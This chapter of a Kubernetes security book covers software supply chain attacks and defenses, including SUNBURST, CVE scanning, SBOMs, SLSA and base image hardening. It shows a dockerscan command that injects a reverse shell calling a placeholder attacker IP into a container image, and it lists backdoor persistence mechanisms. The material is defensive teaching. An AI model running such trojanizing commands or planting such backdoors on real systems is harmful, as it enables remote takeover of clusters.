Chapter 4. Applications and Supply Chain

The SUNBURST supply-chain compromise was a hostile intrusion of US Government and Fortune 500 networks via malware hidden in a legitimately signed, compromised network monitoring product. The Cozy Bear hacking group used techniques described in this chapter to compromise many billion-dollar companies simultaneously. The attackers prioritized high-value targets, so smaller organizations may have escaped the potentially devastating consequences of the breach.

Organizations targeted by the attackers suffered data loss and may have been used as a springboard for further attacks against their own customers. This is the essential risk of a “trusted” supply chain: anybody who consumes something you produce becomes a potential target when you are compromised. The established trust relationship is exploited, and malicious software is inadvertently trusted.

Often, vulnerabilities for which an exploit exists don’t have a corresponding software patch or workaround: Palo Alto Networks research determined this is the case for 80% of new, public exploits. With this level of risk exposure for all running software, denying malicious actors access to your internal networks is the primary line of defense.

The SUNBURST attack infected SolarWinds build pipelines and altered source code immediately before it was built, then hid the evidence of tampering and ensured the binary was signed by the CI/CD system so consumers would trust it.

These techniques were previously unseen on the MITRE ATT&CK framework, and the compromised networks were plundered for military, government, and corporate secrets—all enabled by the initial supply chain attack. Preventing the ignoble, crafty Captain Hashjack and their pals from covertly entering the organization’s network via any dependencies (libraries, tooling, or otherwise) is the job of supply chain security: protecting our sources.


In this chapter we dive into supply chain attacks by looking at some historical issues and how they were exploited, then see how containers can either usefully compartmentalize or dangerously exacerbate supply chain risks. In “Defending Against SUNBURST”, we’ll ask: could we have secured a cloud native system from SUNBURST?

For career criminals like Captain Hashjack, the supply chain provides a fresh vector to assault BCTL’s systems: attack by proxy to gain trusted access to your systems. This means attacking container software supply chains to gain remote control of vulnerable workloads and servers, and daisy-chain exploits and backdoors throughout an organization.

Defaults

Unless specifically anticipated and mitigated, supply chain attacks are relatively simple to mount: they strike trusted parts of our system that we would not normally directly observe, like the CI/CD pipelines of our suppliers.

This is a complex problem, as we will discuss in this chapter. As adversarial techniques evolve and cloud native systems adapt, you’ll see how the supply chain risks shift during development, testing, distribution, and runtime.

Threat Model

Most applications do not come hardened by default, and you need to spend time securing them. The OWASP Application Security Verification Standard provides application security (AppSec) guidance that we will not explore any further, except to say: you don’t want to make an attacker’s life easy by running outdated or error-ridden software. Rigorous logic and security tests are essential for any and all software you run.

That extends from your developers’ coding style and web application security standards to the supply chain for everything inside the container itself. Engineering effort is required to make applications secure, and to ensure they remain secure when updated.

Dependencies in the SDLC are especially vulnerable to attack, giving Captain Hashjack opportunities to run malicious code (the “payload”):

  • At installation (package manager hooks, which may be running as root; see the sketch after this list)

  • During development and test (IDEs, builds, and executing tests)

  • At runtime (local, dev, staging, and production Kubernetes pods)
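Package manager hooks deserve particular suspicion, because npm and its peers will happily execute preinstall and postinstall scripts during a routine install. A minimal sketch of auditing a dependency’s hooks before trusting it (the package name is illustrative):

# List the package's lifecycle hooks without installing it
$ npm view suspicious-package scripts --json
# Install without executing any lifecycle scripts
$ npm install suspicious-package --ignore-scripts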

When a payload is executing, it may write further code to the filesystem or pull malware from the internet. It may search for data on a developer’s laptop, a CI server, or production. Any looted credentials form the next phase of the attack.

And applications are not the only software at risk: with infrastructure, policy, and security defined as code, any scripted or automated point of the system that an attacker can infiltrate must be considered, and so is in scope for your threat model.

The Supply Chain

Software supply chains (Figure 4-1) describe the movement of your files: source code, applications, data. They may be plain text, encrypted, on a floppy disk, or in the cloud.

Supply chains exist for anything that is built from other things—perhaps something that humans ingest (food, medicine), use (a CPU, cars), or interact with (an operating system, open source software). Any exchange of goods can be modeled as a supply chain, and some supply chains are huge and complex.

Figure 4-1. A web of supply chains; adapted from https://oreil.ly/r9ndi

Each dependency you use is potentially a malicious implant primed to trigger, awaiting a spark of execution when it’s run in your systems to deploy its payload. Container supply chains are long and may include:

  • The base image(s)

  • Installed operating system packages

  • Application code and dependencies

  • Public Git repositories

  • Open source artifacts

  • Arbitrary files

  • Any other data that may be added

If malicious code is added to your supply chain at any step, it may be loaded into executable memory in a running container in your Kubernetes cluster. This is Captain Hashjack’s goal with malicious payloads: sneak bad code into your trusted software and use it to launch an attack from inside the perimeter of your organization, where you may not have defended your systems as well on the assumption that the “perimeter” will keep attackers out.

Each link of a supply chain has a producer and a consumer. In Table 4-1, the CPU chip producer is the manufacturer, and the next consumer is the distributor. In practice, there may be multiple producers and consumers at each stage of the supply chain.

Table 4-1. Varied example supply chains

| Stage | Farm food | CPU chip | An open source software package | Your organization’s servers |
|---|---|---|---|---|
| Original producer | Farmer (seeds, feed, harvester) | Manufacturer (raw materials, fab, firmware) | Open source package developer (ingenuity, code) | Open source software, original source code built in internal CI/CD |
| (links to) | Distributor (selling to shops or other distributors) | Distributor (selling to shops or other distributors) | Repository maintainer (npm, PyPI, etc.) | Signed code artifacts pushed over the network to production-facing registry |
| (links to) | Local food shop | Vendor or local computer shop | Developer | Artifacts at rest in registry ready for deployment |
| (links to) Final consumer | End user | End user | End user | Latest artifacts deployed to production systems |

Any stage in the supply chain that is not under your direct control is liable to be attacked (Figure 4-2). A compromise of any “upstream” stage—for example, one that you consume—may impact you as a downstream consumer.

For example, an open source software project (Figure 4-3) may have three contributors (or “trusted producers”) with permission to merge external code contributions into the codebase. If one of those contributors’ passwords is stolen, an attacker can add their own malicious code to the project. Then, when your developers pull that dependency into their codebase, they are running the attacker’s hostile code on your internal systems.

Figure 4-2. Similarity between supply chains
Figure 4-3. Open source supply chain attack

But the compromise doesn’t have to start maliciously. As with the npm event-stream vulnerability, sometimes it’s something as innocent as someone looking to pass on maintainership to a seemingly credible new maintainer, who then goes rogue and inserts their own payload.

Note

In this case the vulnerable event-stream package was downloaded 12 million times, and was depended upon by more than 1,600 other packages. The payload searched for “hot cryptocurrency wallets” to steal from developers’ machines. If this had stolen SSH and GPG keys instead and used them to propagate the attack further, the compromise could have been much wider.

A successful supply chain attack is often difficult to detect, as a consumer trusts every upstream producer. If a single producer is compromised, the attacker may target individual downstream consumers or pick only the highest-value targets.

Software

For our purposes, the supply chains we consume are for software and hardware. In a cloud environment, a datacenter’s physical and network security is managed by the provider, but it is your responsibility to secure your use of the system. This means we have high confidence that the hardware we are using is safe. Our usage of it—the software we install and its behavior—is where our supply chain risk starts.

Software is built from many other pieces of software. Unlike CPU manufacturing, where inert components are assembled into a structure, software is more like a symbiotic population of cooperating organisms. Each component may be autonomous, choosing to cooperate (CLI tools, servers, OSs), or useless unless used in a certain way (glibc, linked libraries, most application dependencies). Any software can be autonomous or cooperative, and it is impossible to conclusively prove which it is at any moment in time. This means test code (unit tests, acceptance tests) may still contain malicious code, which could start to explore the continuous integration (CI) build environment or the developer’s machine it is executed on.

This poses a conundrum: if malicious code can be hidden in any part of a system, how can we conclusively say that the entire system is secure?

As Liz Rice points out in Container Security (O’Reilly):

It’s very likely that a deployment of any non-trivial software will include some vulnerabilities, and there is a risk that systems will be attacked through them. To manage this risk, you need to be able to identify which vulnerabilities are present and assess their severity, prioritize them, and have processes in place to fix or mitigate these issues.

Software supply chain management is difficult. It requires you to accept some level of risk and make sure that reasonable measures are in place to detect dangerous software before it is executed inside your systems. This risk is balanced against diminishing returns: builds get more expensive and more difficult to maintain with each added control.

Warning

Full confidence in your supply chain is almost impossible without the full spectrum of controls detailed in the CNCF Security Technical Advisory Group paper on software supply chain security (addressed later in this chapter).

As ever, you assume that no control is entirely effective and run intrusion detection on the build machines as the last line of defense against targeted or widespread zero-day vulnerabilities like SUNBURST, Shellshock, or DirtyCOW (see “Architecting Containerized Apps for Resilience”).

Now let’s look at how to secure a software supply chain, starting with minimum viable cloud native security: scanning for CVEs.

Scanning for CVEs

CVEs are published for known vulnerabilities, and it is critical that you do not give Captain Hashjack’s gruesome crew easy access to your systems by ignoring or failing to patch them. Open source software lists its dependencies in its build instructions (pom.xml, package.json, go.mod, requirements.txt, Gemfile, etc.), which gives us visibility of its composition. This means you should scan those dependencies for CVEs using tools like trivy. This is the lowest-hanging fruit in the defense of the supply chain and should be considered a part of the minimum viable container security processes.

trivy can scan code at rest in various places:

  • In a container image

  • In a filesystem

  • In a Git repository

It reports on known vulnerabilities. Scanning for CVEs is minimum viable security for shipping code to production.

This command scans the local directory and finds the gomod and npm dependency files, reporting on their contents (output was edited to fit):

$ trivy fs . 1
2021-02-22T10:11:32.657+0100    INFO    Detected OS: unknown
2021-02-22T10:11:32.657+0100    INFO    Number of PL dependency files: 2
2021-02-22T10:11:32.657+0100    INFO    Detecting gomod vulnerabilities...
2021-02-22T10:11:32.657+0100    INFO    Detecting npm vulnerabilities...

infra/build/go.sum
==================================
Total: 2 (UNKNOWN: 0, LOW: 0, MEDIUM: 0, HIGH: 2, CRITICAL: 0) 2

+-----------------------------+------------------+----------+-------------...
|           LIBRARY           | VULNERABILITY ID | SEVERITY |         INST...
+-----------------------------+------------------+----------+-------------...
| github.com/dgrijalva/jwt-go | CVE-2020-26160   | HIGH     | 3.2.0+incomp...
|                             |                  |          |             ...
|                             |                  |          |             ...
+-----------------------------+------------------+          +-------------...
| golang.org/x/crypto         | CVE-2020-29652   |          | 0.0.0-202006...
|                             |                  |          |             ...
|                             |                  |          |             ...
|                             |                  |          |             ...
+-----------------------------+------------------+----------+-------------...

infra/api/code/package-lock.json
==================================================
Total: 0 (UNKNOWN: 0, LOW: 0, MEDIUM: 0, HIGH: 0, CRITICAL: 0) 3
1

Run trivy against the filesystem (fs) in the current working directory (.).

2

Scanning has found two high-severity vulnerabilities in infra/build/go.sum.

3

The infra/api/code/package-lock.json has no vulnerabilities detected.
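trivy’s other modes cover the remaining sources in the list above. A short sketch, with illustrative image and repository names:

$ trivy image nginx:1.21                            # scan a container image for known CVEs
$ trivy repo https://github.com/your-org/your-app   # scan a remote Git repository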

So we can scan code in our supply chain to see if it’s got vulnerable dependencies. But what about the code itself?

Ingesting Open Source Software

Securely ingesting code is hard: how can we prove that a container image was built from the same source we can see on GitHub? Or that a compiled application is the same open source code we’ve read, without rebuilding it from source?

While this is hard with open source, closed source presents even greater challenges.

How do we establish and verify trust with our suppliers?

Much to the Captain’s dismay, this problem has been studied since 1983, when Ken Thompson delivered “Reflections on Trusting Trust”:

To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software.

The question of trust underpins many human interactions, and is the foundation of the original internet. Thompson continues:

The moral is obvious. You can’t trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code… As the level of program gets lower, these bugs will be harder and harder to detect. A well installed microcode bug will be almost impossible to detect.

These philosophical questions of security affect your organization’s supply chain, as well as your customers. The core problem remains unsolved and difficult to correct entirely.

While BCTL’s traditional relationship with software was previously defined as that of a consumer, when you started publishing open source on GitHub, you became a producer too. This dual role exists in most enterprise organizations today, although most have not adapted to their new producer responsibilities.

Which Producers Do We Trust?

To secure a supply chain we must have trust in our producers. These are parties outside of your organization and they may include:

  • Security providers such as the root Certificate Authorities to authenticate other servers on a network, and DNSSEC to return the right address for our transmission

  • Cryptographic algorithms and implementations like GPG, RSA, and Diffie-Hellman to secure our data in transit and at rest

  • Hardware enablers like OS, CPU/firmware, and driver vendors to provide us low-level hardware interaction

  • Application developers and package maintainers to prevent malicious code installation via their distributed packages

  • Open source and community-run teams, organizations, and standards bodies, to grow our technologies and communities in the common interest

  • Vendors, distributors, and sales agents to not install backdoors or malware

  • Everybody—not to have exploitable bugs

You may be wondering if it’s ever possible to secure this entirely, and the answer is no. Nothing is ever entirely secure, but everything can be hardened so that it’s less appealing to all except the most skilled of threat actors. It’s all about balancing layers of security controls that might include:

  • Physical second factors (2FA)

    • GPG signing (e.g., Yubikeys)

    • WebAuthn, FIDO2 Project, and physical security tokens (e.g., RSA)

  • Human redundancy

    • Authors cannot merge their own PRs

    • Adding a second person to sign off on critical processes

  • Duplication by running the same process twice in different environments and comparing results

CNCF Security Technical Advisory Group

The CNCF Security Technical Advisory Group (tag-security) published a definitive software supply chain security paper. For an in-depth and immersive view of the field, it is strongly recommended reading.

The paper evaluates many of the available tools and defines four key principles for supply chain security, with steps for each:

  1. Trust: Every step in a supply chain should be “trustworthy” due to a combination of cryptographic attestation and verification.

  2. Automation: Automation is critical to supply chain security and can significantly reduce the possibility of human error and configuration drift.

  3. Clarity: The build environments used in a supply chain should be clearly defined, with limited scope.

  4. Mutual Authentication: All entities operating in the supply chain environment must be required to mutually authenticate using hardened authentication mechanisms with regular key rotation.

Software Supply Chain Best Practices, tag-security

It then covers the main parts of supply chain security:

  1. Source code (what your developers write)

  2. Materials (dependencies of the app and its environment)

  3. Build pipelines (to test and build your app)

  4. Artifacts (your app plus test evidence and signatures)

  5. Deployments (how your consumers access your app)

If your supply chain is compromised at any one of these points, your consumers may be compromised too.

Architecting Containerized Apps for Resilience

You should adopt an adversarial mindset when architecting and building systems so security considerations are baked in. Part of that mindset includes learning about historical vulnerabilities in order to defend yourself against similar attacks.

The granular security policy of a container is an opportunity to reconsider applications as “compromised-by-default,” and configure them so they’re better protected against zero-day or unpatched vulnerabilities.

Note

One such historical vulnerability was DirtyCOW: a race condition in the Linux kernel’s privileged memory mapping code that allowed unprivileged local users to escalate to root.

The bug allowed an attacker to gain a root shell on the host, and was exploitable from inside a container that didn’t block ptrace. One of the authors live demoed preventing a DirtyCOW container breakout with an AppArmor profile that blocked the ptrace system call. There’s an example Vagrantfile to reproduce the bug in Scott Coulton’s repo.
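A minimal sketch of that mitigation, assuming an AppArmor-enabled host; the profile name is illustrative, and a production profile would be far more restrictive:

# Write a profile that denies ptrace, load it, and run a container under it
$ cat <<'EOF' | sudo tee /etc/apparmor.d/no-ptrace
#include <tunables/global>
profile no-ptrace flags=(attach_disconnected) {
  #include <abstractions/base>
  file,
  capability,
  network,
  deny ptrace,
}
EOF
$ sudo apparmor_parser -r /etc/apparmor.d/no-ptrace
$ docker run --rm --security-opt apparmor=no-ptrace nginx:latest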

Detecting Trojans

Tools like dockerscan can trojanize a container:

trojanize: inject a reverse shell into a docker image

dockerscan

Note

We go into more detail on attacking software and libraries in “Captain Hashjack Attacks a Supply Chain”.

To trojanize a webserver image is simple:

$ docker save nginx:latest -o webserver.tar 1
$ dockerscan image modify trojanize webserver.tar \ 2
  --listen "${ATTACKER_IP}" --port "${ATTACKER_PORT}" \ 3
  --output trojanized-webserver 4
1

Export a valid webserver tarball from a container image.

2

Trojanize the image tarball.

3

Specify the attacker’s shellcatcher IP and port.

4

Write to an output tarball called trojanized-webserver.

It’s this sort of attack that your container image scanning should detect and prevent: dockerscan uses an LD_PRELOAD attack, which most container intrusion detection and scanning tools should catch.
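A quick manual check for that mechanism, assuming the implant registers its library via the image’s environment or /etc/ld.so.preload (the tarball and tag come from the example above):

$ docker load -i trojanized-webserver                               # load the tampered tarball
$ docker inspect --format '{{.Config.Env}}' nginx:latest            # look for LD_PRELOAD entries
$ docker run --rm --entrypoint cat nginx:latest /etc/ld.so.preload  # list preloaded libraries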

Dynamic analysis of software involves running it in a malware lab environment where it is unable to communicate with the internet and is observed for signs of C2 (“command and control”), automated attacks, or unexpected behavior.
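A crude sketch of such observation, wrapping the artifact in a container with no network access; the image and binary names are illustrative, and strace must be present in the image:

# Run the candidate offline and trace file, network, and process
# syscalls for unexpected behavior
$ docker run --rm --network none --cap-add SYS_PTRACE \
    suspicious-image:candidate \
    strace -f -e trace=file,network,process /app/suspect-binary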

Note

Malware such as WannaCry (a cryptolocking worm) includes a disabling “killswitch” DNS record (sometimes secretly used by malware authors to remotely terminate attacks). In some cases, this is used to delay the deployment of the malware until a convenient time for the attacker.

Together, an artifact and its runtime behavior should form a picture of the trustworthiness of a single package; however, there are workarounds. Logic bombs (behavior only executed under certain conditions) make this difficult to detect unless the triggering logic is known. For example, SUNBURST closely emulated the valid HTTP calls of the software it infected. Even tracing a compromised application with tools such as sysdig does not clearly surface this type of attack.

Captain Hashjack Attacks a Supply Chain


You know BCTL hasn’t put enough effort into supply chain security. Open source ingestion isn’t regulated, and developers ignore the results of CVE scanning in the pipeline.

Dread Pirate Hashjack dusts off their keyboard and starts the attack. The goal is to add malicious code to a container image, an open source package, or an operating system application that your team will run in production.

In this case, Captain Hashjack is looking to attack the rest of your systems from a foothold in an initial pod attack. When the malicious code runs inside your pods it will connect back to a server that the Captain controls. That connection will relay attack commands to run inside that pod in your cluster so the pirates can have a look around, as shown in Figure 4-4.

From this position of remote control, Captain Hashjack might:

  • Enumerate other infrastructure around the cluster like datastores and internally facing software

  • Try to escalate privilege and take over your nodes or cluster

  • Mine cryptocurrency

  • Add the pods or nodes to a botnet, use them as servers, or “watering holes” to spread malware

  • Carry out any other unintended misuse of your systems

Figure 4-4. Establishing remote access with a supply chain compromise

The Open Source Security Foundation (OpenSSF)’s SLSA Framework (“Supply-chain Levels for Software Artifacts,” or “Salsa”) works on the principle that “It can take years to achieve the ideal security state, and intermediate milestones are important.” It defines a graded approach to adopting supply chain security for your builds (see Table 4-2).

Table 4-2. OpenSSF SLSA levels

| Level | Description | Requirements |
|---|---|---|
| 0 | No guarantees | SLSA 0 represents the lack of any SLSA level. |
| 1 | Provenance checks to help evaluate risks and security | The build process must be fully scripted/automated and generate provenance. |
| 2 | Further checks against the origin of the software | Requires using version control and a hosted build service that generates authenticated provenance. This results in tamper resistance of the build service. |
| 3 | Extra resistance to specific classes of threats | The source and build platforms meet specific standards to guarantee the auditability of the source and the integrity of the provenance, respectively. Advanced protection, including security controls on the host, nonfalsifiable provenance, and prevention of cross-build contamination. |
| 4 | Highest levels of confidence and trust | Strict auditability and reliability checks. Requires two-person review of all changes and a hermetic, reproducible build process. |

Let’s move on to the aftermath.

Post-Compromise Persistence

Before attackers do something that may be detected by the defender, they look to establish persistence—a backdoor—so they can re-enter the system if they are detected and unceremoniously ejected, or if their method of intrusion is patched.

Note

When containers restart, filesystem changes are lost, so persistence is not possible just by writing to the container filesystem. Dropping a “backdoor” or other persistence mechanism in Kubernetes requires the attacker to use other parts of Kubernetes, or the kubelet on the host.

Depending on how you were compromised, Captain Hashjack now has various options available. None are possible in a well-configured container without excessive RBAC privilege, although this doesn’t stop the attacker exploiting the same path again and looking to pivot to another part of your system.

Possible persistence in Kubernetes can be gained by the following (a brief audit sketch follows the list):

  • Starting a static privileged pod through the kubelet’s static manifests

  • Deploying a privileged container directly using the container runtime

  • Deploying an admission controller or CronJob with a backdoor

  • Deploying a shadow API server with custom authentication

  • Adding a mutating webhook that injects a backdoor container to some new pods

  • Adding worker or control plane nodes to a botnet or C2 network

  • Editing container lifecycle postStart and preStop hooks to add backdoors

  • Editing liveness probes to exec a backdoor in the target container

  • Any other mechanism that runs code under the attacker’s control
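A few of these mechanisms leave footprints that are cheap to audit. A minimal sketch, assuming cluster credentials, node access, and jq:

# Static pod manifests dropped onto a node (run on the node itself)
$ ls -la /etc/kubernetes/manifests/
# Webhooks that could inject containers into new pods
$ kubectl get mutatingwebhookconfigurations
# Scheduled workloads that could re-establish access
$ kubectl get cronjobs --all-namespaces
# Lifecycle hooks that exec commands in containers
$ kubectl get pods --all-namespaces -o json | \
    jq '.items[].spec.containers[].lifecycle | select(. != null)'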

Risks to Your Systems

Once they have established persistence, attackers may become bolder and more dangerous:

  • Exfiltrating data, credentials, and cryptocurrency wallets

  • Pivoting further into the system via other pods, the control plane, worker nodes, or cloud account

  • Cryptojacking compute resources (e.g., mining Monero in Docker containers)

  • Escalating privilege in the same pod

  • Cryptolocking data

  • Secondary supply chain attack on target’s published artifacts/software

Let’s move on to container images.

Container Image Build Supply Chains

Your developers have written code that needs to be built and run in production. CI/CD automation enables the building and deployment of artifacts, and is a traditionally appealing target because it receives less security rigor than the production systems it deploys to.

To address this insecurity, the Software Factory pattern is gaining adoption as a model for building the pipelines to build software.

Software Factories

A Software Factory is a form of CI/CD that focuses on self-replication. It is a build system that can deploy copies of itself, or other parts of the system, as new CI/CD pipelines. This focus on replication ensures build systems are repeatable, easy to deploy, and easy to replace. They also assist iteration and development of the build infrastructure itself, which makes securing these types of systems much easier.

Use of this pattern requires slick DevOps skills, continuous integration, and build automation practices, and is ideal for containers due to their compartmentalised nature.

Tip

The DoD Software Factory pattern defines the Department of Defense’s best practice ideals for building secure, large-scale cloud or on-prem cloud native infrastructure.

Container images built from, and used to build, the DoD Software Factory are publicly available at IronBank GitLab.

Cryptographic signing of build steps and artifacts can increase trust in the system, and can be revalidated with an admission controller such as portieris for Notary and Kritis for Grafeas.

Tekton is a Kubernetes-based build system that runs build stages in containers. It runs Kubernetes Custom Resources that define build steps in pods, and Tekton Chains can use in-toto to sign the pod’s workspace files. Jenkins X is built on top of it and extends its feature set.

Blessed Image Factory

Some software factory pipelines are used to build and scan your base images, in the same way virtual machine images are built: on a cadence, and in response to releases of the underlying image. An image build is untrusted if any of the inputs to the build are not trusted. An adversary can attack a container build with:

  • Malicious commands in a RUN directive that can attack the host

  • Host’s non-loopback network ports/services

  • Enumeration of other network entities (cloud provider, build infrastructure, network routes to production)

  • Malicious FROM image that has access to build Secrets

  • Malicious image with an ONBUILD directive

  • Docker-in-docker and mounted container runtime sockets that can lead to host breakout

  • Zero-days in container runtime or kernel

  • Network attack surface (host, ports exposed by other builds)

To defend from malicious builds, you should begin with static analysis using Hadolint and conftest to enforce your policy. For example:

$ docker run --rm -i hadolint/hadolint < Dockerfile
/dev/stdin:3 DL3008 Pin versions in apt get install.
/dev/stdin:5 DL3020 Use COPY instead of ADD for files and folders

Conftest wraps OPA and runs Rego language policies (see “Open Policy Agent”):

$ conftest test --policy ./test/policy --all-namespaces Dockerfile
2 tests, 2 passed, 0 warnings, 0 failures, 0 exceptions

If the Dockerfile conforms to policy, scan the container build workspace with tools like trivy. You can also build and then scan the image, although this is slightly riskier: a malicious build step could spawn a reverse shell from inside the build environment.

If the container’s scan is safe, you can perform a build.

Tip

Adding a hardening stage to the Dockerfile helps to remove unnecessary files and binaries that an attacker may try to exploit, and is detailed in DoD’s Container Hardening Guide.

Protecting the build’s network is important, otherwise malicious code in a container build can pull further dependencies and malicious code from the internet. Security controls of varying difficulty include:

  • Preventing network egress (see the sketch after this list)

  • Isolating from the host’s kernel with a VM

  • Running the build process as a nonroot user or in a user namespace

  • Executing RUN commands as a nonroot user in container filesystem

  • Sharing nothing nonessential with the build
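As a sketch of the first control, Docker can cut a build off from the network entirely, so any step that tries to fetch code from the internet fails fast (the image tag is illustrative):

# All dependencies must already be vendored into the build context
$ docker build --network=none -t bctl/app:dev .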

Base Images

When an application is being packaged for deployment it must be built into a container image. Depending on your choice of programming language and application dependencies, your container will use one of the base images from Table 4-3.

Table 4-3. Types of base images

| Type of base image | How it’s built | Contents of image filesystem | Example container image |
|---|---|---|---|
| Scratch | Add one (or more) static binary to an empty container root filesystem. | Nothing at all except /my-binary (it’s the only thing in the / directory), and any added dependencies (often CA bundles, locale information, static files for the application). | Static Golang or Rust binary examples |
| Distroless | Add one (or more) static binary to a container that has locale and CA information only (no Bash, Busybox, etc.). | Nothing except my-app, /etc/locale, TLS pubkeys (plus any dependencies, as per scratch), etc. | Static Golang or Rust binary examples |
| Hardened | Add nonstatic binary or dynamic application to a minimal container, then remove all nonessential files and harden the filesystem. | Reduced Linux userspace: glibc, /code/my-app.py, /code/deps, /bin/python, Python libs, static files for the application. | Web servers, nonstatic or complex applications, IronBank examples |
| Vanilla | No security precautions, possibly dangerous. | Standard Linux userspace. Root user. Possibly anything and everything required to install, build, compile, or debug applications. This offers many opportunities for attack. | NGINX, raesene/alpine-nettools, nicolaka/netshoot |

Minimal containers reduce a container’s attack surface to a hostile process or RCE, forcing an adversary into very advanced techniques like return-oriented programming that are beyond most attackers’ capabilities. Organized criminals like Dread Pirate Hashjack may be able to use these techniques, but exploits like these are valuable and perhaps more likely to be sold to an exploit broker than used in the field, where discovery would reduce their value.

Because statically compiled binaries ship their own system call library, they do not need glibc or another userspace kernel interface, and can exist with only themselves on the filesystem (see Figure 4-5).

Figure 4-5. How scratch containers and glibc talk to the kernel
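A minimal sketch of producing such an image for a Go application (all names are illustrative):

# Compile a static binary (CGO disabled, so no glibc needed), then
# package it into an empty scratch filesystem
$ CGO_ENABLED=0 go build -o my-binary .
$ cat <<'EOF' > Dockerfile
FROM scratch
COPY my-binary /my-binary
ENTRYPOINT ["/my-binary"]
EOF
$ docker build -t bctl/my-binary:latest .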

Let’s step back a bit now: we need to take stock of our supply chain.

The State of Your Container Supply Chains

Applications in containers bundle all their userspace dependencies with them, which allows us to inspect the composition of an application. The blast radius of a compromised container is smaller than that of a bare-metal server (the container provides security configuration around the namespaces), but it is exacerbated by the highly parallelised nature of a Kubernetes workload deployment.

Secure third-party code ingestion requires trust and verification of upstream dependencies.

Kubernetes components (OS, containers, config) are a supply chain risk in themselves. Kubernetes distributions that pull unsigned artifacts from object storage (such as S3 and GCS) have no way of validating that the developers meant them to run those containers. Any containers with “escape-friendly configuration” (disabled security features, a lack of hardening, unmonitored and unsecured, etc.) are viable assets for attack.

The same is true of supporting applications (logging/monitoring, observability, IDS)—anything that is installed as root, that is not hardened, or indeed not architected for resilience to compromise, is potentially subjected to swashbuckling attacks from hostile forces.

Third-Party Code Risk

During the image build your application installs dependencies into the container, and the same dependencies are often installed onto developers’ machines. This requires the secure ingestion of third-party and open source code.

You value your data security, so running any code from the internet without first verifying it could be unsafe. Adversaries like Captain Hashjack may have left a backdoor to enable remote access to any system that runs their malicious code. You should be satisfied that the risk of such an attack is sufficiently low before you allow the software inside your organization’s corporate network and production systems.

One method to scan ingested code is shown in Figure 4-6. Containers (and other code) that originate outside your organization are pulled from the internet onto a temporary virtual machine. All software signatures and checksums are verified, binaries and source code are scanned for CVEs and malware, and the artifact is packaged and signed for consumption in an internal registry.

Figure 4-6. Third-party code ingestion

In this example a container pulled from a public registry is scanned for CVEs, retagged for the internal domain, then signed with Notary and pushed to an internal registry, where it can be consumed by Kubernetes build systems and your developers.
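Expressed as commands, the flow might look like this sketch (the internal registry name is illustrative; setting DOCKER_CONTENT_TRUST enables Notary signing on push):

$ docker pull nginx:1.21                                   # ingest from the public registry
$ trivy image nginx:1.21                                   # scan for known CVEs
$ docker tag nginx:1.21 registry.bctl.internal/nginx:1.21  # retag for the internal domain
$ export DOCKER_CONTENT_TRUST=1                            # sign with Notary on push
$ docker push registry.bctl.internal/nginx:1.21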

When ingesting third-party code you should be cognizant of who has released it and/or signed the package, the dependencies it uses itself, how long it has been published for, and how it scores in your internal static analysis pipelines.

Tip

Aqua’s Dynamic Threat Analysis for Containers runs potentially hostile containers in a sandbox to observe their behavior for signs of malice.

Scanning third-party code before it enters your network protects you from some supply chain compromises, but targeted attacks may be harder to defend against as they may not use known CVEs or malware. In these cases you may want to observe it running as part of your validation.

Software Bills of Materials

Creating a software bill of materials (SBOM) for a container image is easy with tools like syft, which supports APK, DEB, RPM, Ruby Bundles, Python Wheel/Egg/requirements.txt, JavaScript NPM/Yarn, Java JAR/EAR/WAR, Jenkins plugins JPI/HPI, and Go modules.

It can generate output in the CycloneDX XML format. Here it is running on a container with a single static binary:

user@host:~ [0]$ syft packages controlplane/bizcard:latest -o cyclonedx
Loaded image
Parsed image
Cataloged packages      [0 packages]
<?xml version="1.0" encoding="UTF-8"?>
<bom xmlns="http://cyclonedx.org/schema/bom/1.2"
    version="1" serialNumber="urn:uuid:18263bb0-dd82-4527-979b-1d9b15fe4ea7">
  <metadata>
    <timestamp>2021-05-30T19:15:24+01:00</timestamp>
    <tools>
      <tool>
        <vendor>anchore</vendor>   1
        <name>syft</name>          2
        <version>0.16.1</version>  3
      </tool>
    </tools>
    <component type="container">  4
      <name>controlplane/bizcard:latest</name> 5
      <version>sha256:183257b0183b8c6420f559eb5591885843d30b2</version> 6
    </component>
  </metadata>
  <components></components>
</bom>
1

The vendor of the tool used to create the SBOM.

2

The tool that’s created the SBOM.

3

The tool version.

4

The supply chain component being scanned, and its type (container).

5

The container’s name.

6

The container’s version, a SHA256 content hash, or digest.

A bill of materials is just a packing list for your software artifacts. Running against the alpine:latest image, we see an SBOM with software licenses (output edited to fit):

user@host:~ [0]$ syft packages alpine:latest -o cyclonedx
 ✔ Loaded image
 ✔ Parsed image
 ✔ Cataloged packages      [14 packages]
<?xml version="1.0" encoding="UTF-8"?>
<bom xmlns="http://cyclonedx.org/schema/bom/1.2"
     version="1" serialNumber="urn:uuid:086e1173-cfeb-4f30-8509-3ba8f8ad9b05">
  <metadata>
    <timestamp>2021-05-30T19:17:40+01:00</timestamp>
    <tools>
      <tool>
        <vendor>anchore</vendor>
        <name>syft</name>
        <version>0.16.1</version>
      </tool>
    </tools>
    <component type="container">
      <name>alpine:latest</name>
      <version>sha256:d96af464e487874bd504761be3f30a662bcc93be7f70bf</version>
    </component>
  </metadata>
  <components>
  ...
  <component type="library">
      <name>musl</name>
      <version>1.1.24-r9</version>
      <licenses>
        <license>
          <name>MIT</name>
        </license>
      </licenses>
      <purl>pkg:alpine/musl@1.1.24-r9?arch=x86_64</purl>
    </component>
  </components>
</bom>

These verifiable artifacts can be signed by supply chain security tools like cosign, in-toto, and notary. When consumers demand that suppliers produce verifiable artifacts and bills of materials from their own audited, compliant, and secure software factories, the supply chain will become harder to compromise for the casual attacker.

Warning

If source code is attacked before an artifact is built or an SBOM is generated from it, the malicious artifact is still trusted, as with SUNBURST. This is why the build infrastructure must be secured.

Human Identity and GPG

Signing Git commits with GNU Privacy Guard (GPG) signatures identifies the owner of the key as having trusted the commit at the time of signature. This is useful to increase trust, but requires public key infrastructure (PKI), which is notoriously difficult to secure entirely.

Signing data is easy—the verification is hard.

Dan Lorenc

The problem with PKI is the risk of a breach of that infrastructure itself. Somebody is always responsible for ensuring the public key infrastructure (the servers that host individuals’ trusted public keys) is not compromised and is reporting correct data. If PKI is compromised, an entire organization may be exploited as attackers add keys they control to trusted users.
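The signing half really is easy. A sketch, assuming a GPG key is already on your keyring:

$ git config user.signingkey "${MY_KEY_ID}"   # select the signing key
$ git commit -S -m "add payment validation"   # sign the commit
$ git log --show-signature -1                 # check the signature locally

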